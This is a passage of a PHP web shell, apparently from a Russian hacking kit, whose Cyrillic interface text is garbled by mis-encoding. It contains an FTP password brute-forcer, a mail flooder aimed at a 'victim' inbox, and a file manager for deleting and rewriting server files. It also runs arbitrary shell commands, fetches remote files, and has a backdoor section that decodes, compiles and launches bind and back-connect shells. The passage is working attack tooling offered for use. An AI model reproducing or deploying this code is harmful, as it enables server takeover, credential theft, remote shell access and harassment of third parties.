+ <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+ <b><a href=?ac=ftppass>Ïğîâåğèòü íà ñâÿçêó login\password</a></b>
+</td></tr>
+ 
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Êîëëè÷åñòâî ïàğîëåé:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10> <1000 pass </td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Ïàğîëü äëÿ ïğîâåğêè:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='proverka' size=50>
+<input type='submit' value='Brut FTP' class=button1 $style_button><br><b>Ëîã ñîõğàíÿåòñÿ â pass.txt</b></td></tr>
+
+
+ 
+ </form></table>";
+ 
+ 
+function s() {
+   $word="qwrtypsdfghjklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+
+function g() {
+   $word="euioam";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+
+function name0() {   return s().g().s();                        }
+function name1() {   return s().g().s().g();                    }
+function name2() {   return s().g().g().s();                    }
+function name3() {   return s().s().g().s().g();                }
+function name4() {   return g().s().g().s().g();                }
+function name5() {   return g().g().s().g().s();                }
+function name6() {   return g().s().s().g().s();                }
+function name7() {   return s().g().g().s().g();                }
+function name8() {   return s().g().s().g().g();                }
+function name9() {   return s().g().s().g().s().g();            }
+function name10() {   return s().g().s().s().g().s().s();        }
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+function randword() {
+   global $cool;
+   $func="name".mt_rand(0,11);
+   $func2="name".mt_rand(0,11);
+   switch (mt_rand(0,11)) {
+      case 0: return $func().mt_rand(5,99);
+      case 1: return $func()."-".$func2();
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+      case 3: return $func()."!".$func();
+      case 4: return randpass(mt_rand(5,12));
+      default: return $func();
+   }
+ 
+ 
+}
+
+function randpass($len) {
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+   $s="";
+   for ($i=0; $i<$len; $i++) {
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+   }
+   return $s;
+}
+if (@unlink("pass.txt") < 0){
+echo "íåòó íè÷åãî";
+exit;
+}
+$file="pass.txt"; 
+if($file && $host && $login){
+   $cn=mt_rand(30,30);
+for ($i=0; $i<$cn; $i++) {
+   $s=$cool2[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$s\n");
+   }
+ 
+  $cnt2=mt_rand(43,43);
+for ($i=0; $i<$cnt2; $i++) {
+   $r=$cool[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$login$r\n");
+}    
+$p="$proverka";
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$p\n");
+   
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$u\n");
+  } 
+  
+  if(is_file($file)){
+ $passwd=file($file,1000);
+  for($i=0; $i<count($passwd); $i++){
+   $stop=false;
+   $password=trim($passwd[$i]);
+   $open_ftp=@fsockopen($host,21);
+    if($open_ftp!=false){
+     fputs($open_ftp,"user $login\n");
+     fputs($open_ftp,"pass $password\n");
+     while(!feof($open_ftp) && $stop!=true){
+      $text=fgets($open_ftp,4096);
+      if(preg_match("/230/",$text)){
+       $stop=true;
+	   $f=@fopen($host._ftp,"a+");
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+       echo "
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Ïîçäğàâëÿş!!! Ïàğîëü ïîäîáğàí.</font></b><br>
+&nbsp;&nbsp;Êîíåêò: <b>$host</b><br>&nbsp;&nbsp;Ëîãèí: <b>$login</b><br>&nbsp;&nbsp;Ïàğîëü: <b>$password</b></td></tr></table>
+";exit;
+      }
+      elseif(preg_match("/530/",$text)){
+       $stop=true;
+      
+      }
+     }
+     fclose($open_ftp);
+   }else{
+    echo "
+	<TABLE CELLPADDING=0 CELLSPACING=0  width=500 align=center>
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>Íå âåğíî óêàçàíî ôòï õîñòèíãà!!! Íà <b><u>$host</u></b> çàêğûò 21 ïîğò</b></b></td></tr>
+</table>
+";exit;
+   }
+  }
+ }
+}
+
+
+break;
+// SQL Attack
+case "sql":
+
+break;
+
+
+
+
+
+
+// MailFlud
+case "mailfluder":
+
+$email=$_POST['email']; // Ìûëî æåğòâû
+$from=$_POST['from']; // Ìûëî æåğòâû
+$num=$_POST['num']; // ×èñëî ïèñåì
+$text=$_POST['text']; // Òåêñò ôëóäà
+$kb=$_POST['kb']; // Âåñ ïèñüìà (kb)
+?>
+<script language="JavaScript"><!--
+function reset_form() {
+document.forms[0].elements[0].value="";
+document.forms[0].elements[1].value="";
+document.forms[0].elements[2].value="";
+document.forms[0].elements[3].value="";
+document.forms[0].elements[4].value="";
+}
+//--></script>
+<?php
+if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) {
+
+$num_text=strlen($text)+1; // Îïğåäåëÿåò äëèííó òåêñòà + 1 (ïğîáåë â êîíöå)
+$num_kb=(1024/$num_text)*$kb;
+$num_kb=ceil($num_kb);
+
+for ($i=1; $i<=$num_kb; $i++) {
+$msg=$msg.$text." ";
+}
+
+for ($i=1; $i<=$num; $i++) {
+mail($email, $text, $msg, "From: $from");
+}
+
+$all_kb=$num*$kb;
+
+echo <<<EOF
+<p align="center">Æåğòâà: <b>$email</b><br>
+Êîë-âî ïèñåì: <b>$num</b><br>
+Îáùèé ïîñëàííûé îáúåì: <b>$all_kb kb</b><br></p>
+EOF;
+
+}
+
+else {
+
+echo <<<EOF
+<form action="?ac=mailfluder" method="post">
+<table align="center" border="0" bordercolor="#000000">
+<tr><td>Ìûëî æåğòâû</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr>
+<tr><td>Îò ìûëà</td><td><input type="text" name="from" value="sypport@mail.com" size="25"></td></tr>
+<tr><td>×èñëî ïèñåì</td><td><input type="text" name="num" value="5" size="25"></td></tr>
+<tr><td>Òåêñò ôëóäà</td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr>
+<tr><td>Âåñ ïèñüìà (kb)</td><td><input type="text" name="kb" value="10" size="25"></td></tr>
+<tr><td colspan="2" align="center"><input type="submit">&nbsp;&nbsp;<input type="button" onclick="reset_form()" value="Reset"></td></tr>
+</table>
+</form>
+EOF;
+
+}
+break;
+
+case "tar":
+# àğõèâàöèÿ äèğåêòîğèè
+$fullpath = $d."/".$tar;
+/* çàäàåì ğàíäîìíûå íàçâàíèÿ ôàéëîâ àğõèâàöèè*/
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+for ($i=0; $i<6; $i++)  $charsname .= $CHARS[rand(0,strlen($CHARS)-1)];
+ echo "<br>
+Êàòàëîã <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $charsname.tar.gz")."óïàêîâàí â ôàéë <u>$charsname.tar.gz</u>";
+
+
+
+echo "
+
+<form action='?ac=tar' method='post'>
+<tr><td align=center colspan=2 class=pagetitle><b>Àğõèâàöèÿ <u>$name.tar.gz</u>:</b></td></tr>
+<tr>
+<td valign=top><input type=text name=archive size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+<td valign=top><input type=submit value='Äàâè'></td>
+</tr></form>";
+
+exec($archive);
+
+break;
+
+
+// Íàâèãàöèÿ
+case "navigation":
+ // Ïîøëà íàâèãàöèÿ
+$mymenu = "  [<a href='$php_self?ac=navigation&d=$d&e=$e&delete=1'>Óäàëèòü</a>] [<a href='$php_self?ac=navigation&d=$d&ef=$e&edit=1'>Ğåäàêòèğîâàòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&clean=1'>Î÷èñòèòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&replace=1'>Çàìåíèòü òåêñò</a>] [<a href='$php_self?ac=navigation&d=$d&download=$e'>Çàãğóçèòü</a>]  [<a href='$php_self?ac=navigation&d=$d&infofile=$e'>Èíôîğìàöèÿ</a>]<br>";
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+
+
+
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?ac=navigation&d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?ac=navigation&d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?ac=navigation&d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+echo "</td></tr>";
+echo "<br><td><b>id:</b> ".@exec('id')."</td></tr";
+
+
+if(@$_GET['deldir']=="1"){
+
+@$dir=$_GET['d'];
+function deldir($d)
+{
+$handle = @opendir($d);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$d/$ff")){
+deldir("$d/$ff");
+}else{
+@unlink("$d/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($d)){
+@$success = true;}
+return @$success;
+}
+$dir=@$d;
+deldir($d);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<br><b>Êàòàëîã óäàëåí !</b>";
+echo $copyr;
+exit;}
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo $mymenu ;
+echo "
+Ñğåäñòâî çàìåíû:<br>
+(Òû ìîæåø çàìåíÿòü ëşáîé òåêñò)<br>
+Ôàéë: $de<br>
+<form method=post>
+1. Òâîé IP.<br>
+2. microsoft.com IP :)<br>
+Çàìåíÿòü ıòî <input name=this size=30 value=$ip> ıòèì <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Çàìåíèòü>
+</form>
+";
+
+if(@$_POST['doit']){
+
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$this","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$this Çàìåíåíî íà $bythis<br>
+[<a href='$php_self?ac=navigation&d=$d&e=$e'>Ïîñìîòğåòü ôàéë</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Óäàëèë $d/$e íå ïàğñÿ ! <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?ac=navigation&d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
+echo $mymenu ;
+echo "
+Ñîäåğæèìîå ôàéëà:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>";
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+Óäàëåíèå: Òû óâåğåí ?<br>
+<a href=\"$php_self?ac=navigation&d=$d&e=$e&delete=".@$delete."&yes=yes\">Äà</a> || <a href='$php_self?no=1'>Íåò</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
+echo $mymenu ;
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Ğåäàêòèğîâàíèå:<br>
+$de<br>
+<form method=post>
+<input type=HIDDEN name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Ñîõğàíèòü èçìåíèÿ'></form><br>
+
+";
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+$editf=stripslashes($editf);
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$ef\">";
+exit;
+}
+ 
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<a href='?ac=tar&d=$d' title='Àğõèâàöèÿ ïğîèçîéäåò òîëüêî ïğè íàëè÷èè ïğàâ çàïèñè â êàòàëîã !'><b>[Àğõèâàöèÿ êàòàëîãà] </b></a>
+<a href='?ac=tar&as=mail&d=$d' title='Ïğîèñõîäèò àğõèâàöèÿ êàòàëîãà + îòïğàâêà àğõèâà íà âàø e-mail ! Ô-öèÿ íå äîñòóïíà â 0.5à âåğñèè!'><b>[Àğõèâàöèÿ êàòàëîãà + Îòïğàâêà íà å-mail] </b></a>
+<a href='?ac=navigation&d=$d&deldir=1' title='Ïîëíîå óäàëåíèå êàòàëîãà !\n Ñïğàøèâàòü ïîäòâåğæäåíèÿ òåáÿ íèêòî íå áóäåò :)'><b>[Óäàëåíèå êàòàëîãà] </b></a>
+<tr><td bgcolor=#4d9ef0><center><b>Íàçâàíèå</b></td><td bgcolor=#4d9ef0><b>Ğàçìåğ</b></td><td bgcolor=#4d9ef0><b>Äîñòóï</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Êàòàëîã íå ñóùåñòâóåò èëè äîñòóï ê íåìó çàïğåùåí !</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+for ($i=0;$i<sizeof($dirs);$i++) {
+   if ($dirs[$i] != "..") {
+
+
+if(is_writable($dirs[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#aed7ff";}else{$color="#68adf2";}
+$linkd="<a href='$php_self?ac=navigation&d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color>$info</td></tr>";
+}
+}
+for ($i=0;$i<sizeof($files);$i++) {
+if(is_writable($files[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$prava=perm($perms);
+if($i%2){$color="#ccccff";}else{$color="#b0b0ff";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?ac=navigation&d=$d&e=$files[$i]'title='Äîñòóï $prava. Âëàäåëåö $owner/$group'>$files[$i]</a></td><td bgcolor=$color>$siz</td><td bgcolor=$color>$prava</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+break;
+// Óñòàíîâêà áåêäîğà
+case "backconnect":
+echo "<b>Óñòàíîâêà áåêäîğà / îòêğûòèå ïîğòà</b>";
+echo "<form name=bind method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>Îòêğûòü ïîğò </b>";
+echo "<input type=text name=port size=15 value=11457>&nbsp;";
+echo "<b>Ïàğîëü äëÿ äîñòóïà </b>";
+echo "<input type=text name=bind_pass size=15 value=nrws>&nbsp;";
+echo "<b>Èñïîëüçîâàòü </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=Îòêğûòü>";
+echo "</font>";
+echo "</form>";
+
+echo "<b>Óñòàíîâêà áåêäîğà / áåêêîííåêò</b>";
+echo "<form name=back method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>IP-àäğåñ </b>";
+echo "<input type=text name=ip size=15 value=127.0.0.1>&nbsp;";
+echo "<b>Ïîğò </b>";
+echo "<input type=text name=port size=15 value=31337>&nbsp;";
+echo "<b>Èñïîëüçîâàòü </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=Âûïîëíèòü>";
+echo "</font>";
+echo "</form>";
+
+
+/* port bind C */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/bd.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/bd.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
+ unlink("/tmp/bd.c");
+ $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bd";
+ $err=0;
+ }
+}
+
+/* port bind Perl */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/bdpl","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Îøèáêà! Íå ìîãó çàïèñàòü â /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_pl));
+ fclose($w_file);
+ $bind_string="perl /tmp/bdpl ".$_POST['port']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bdpl";
+ $err=0;
+ }
+}
+
+/* back connect Perl */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/back","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Îøèáêà! Íå ìîãó çàïèñàòü â /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect));
+ fclose($w_file);
+ $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"Ñåé÷àñ ñêğèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+
+/* back connect C */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/back.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/back.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/backc /tmp/back.c");
+ unlink("/tmp/back.c");
+ $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"Ñåé÷àñ ñêğèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<br>Ğåçóëüòàò: ";
+echo "<font color=red size=2";
+print "".passthru($_POST['cmd'])."";
+echo "</font></b>";
+break;
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>Çàãğóçêà ôàéëîâ</b>
+<a href='$php_self?ac=massupload&d=$d&t=massupload'>* Çàãğóçèòü áîëüøîå êîëè÷åñòâî ôàéëîâ *</a><br><br>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéë:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td><br>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéë óñïåøíî çàãğóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ğàçìåğ:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãğóçèòü ôàéë. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+
+
+echo "<form enctype='multipart/form-data' action='?ac=upload&status=ok' method=post>
+<b>Çàãğóçêà ôàéëîâ ñ óäàëåííîãî êîìïüşòåğà:</b><br>
+ HTTP ïóòü ê ôàéëó: <br>
+<input type='text' name='file3' value='http://' size=40><br>
+Íàçâàíèå ôàéëà èëè ïóòü ñ íàçâàíèåì ôàéëà: <br>
+<input type='text' name='file2' value='$docr/' size=40><br>
+<input type='submit' value='Çàãğóçèòü ôàéë'></form>";
+
+
+if (!isset($status)) downfiles();
+
+else
+{
+
+$data = @implode("", file($file3));
+$fp = @fopen($file2, "wb");
+@fputs($fp, $data);
+$ok = @fclose($fp);
+if($ok)
+{
+$size = filesize($file2)/1024;
+$sizef = sprintf("%.2f", $size);
+
+print "<br><center>Âû çàãğóçèëè: <b>ôàéë <u>$file2</u> ğàçìåğîì</b> (".$sizef."êÁ) </center>";
+}
+else
+{
+print "<br><center><font color=red  size = 2><b>Îøèáêà çàãğóçêè ôàéëà</b></font></center>";
+}
+}
+
+
+
+break;
+// Tools
+case "tools":
+echo "<form method=post>Ãåíåğàöèÿ md5 øèôğà<br><input name=md5 size=30></form><br>";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5 ñãåíåğèğîâàí:<br> ".md5($md5)."";}
+echo "<br>
+<form method=post>Êîäèğîâàíèå/äåêîäèğîâàíèå base64<br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+Êîäèğîâàíî:<br><textarea rows=8 cols=80>".base64_encode($base64)."</textarea><br>
+Äåêîäèğîâàíî: <br><textarea rows=8 cols=80>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post>DES êîäèğîâàíèå:<br><input name=des size=30></form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "Des ñãåíåğèğîâàí: <br>".crypt($des)."";}
+echo "<br>
+<form method=post>SHA1 êîäèğîâàíèå:<br><input name=sha1 size=30></form><br>";
+if(@$_POST['sha1']){
+@$des=@$_POST['sha1'];
+echo "SHA1 ñãåíåğèğîâàí: <br>".sha1($sha1a)."";}
+
+echo "<form method=POST>";
+echo "html-êîä -> øåñòíàäöàòèğè÷íûå çíà÷åíèÿ<br><input type=text name=data size=30>";
+
+
+if (isset($_POST['data']))
+{
+echo "<br><br><b>Ğåçóëüòàò:<br></b>";
+$str=str_replace("%20","",$_POST['data']);
+for($i=0;$i<strlen($str);$i++)
+{
+$hex=dechex(ord($str[$i]));
+if ($str[$i]=='&') echo "$str[$i]";
+else if ($str[$i]!='\\') echo "%$hex";
+}
+}
+exit;
+break;
+// Mass Uploading
+case "massupload":
+
+
+echo "
+Ìàñîâàÿ çàãğóçêà ôàéëîâ:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$docr'><br>
+<input type=submit value=Çàãğóçèòü name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
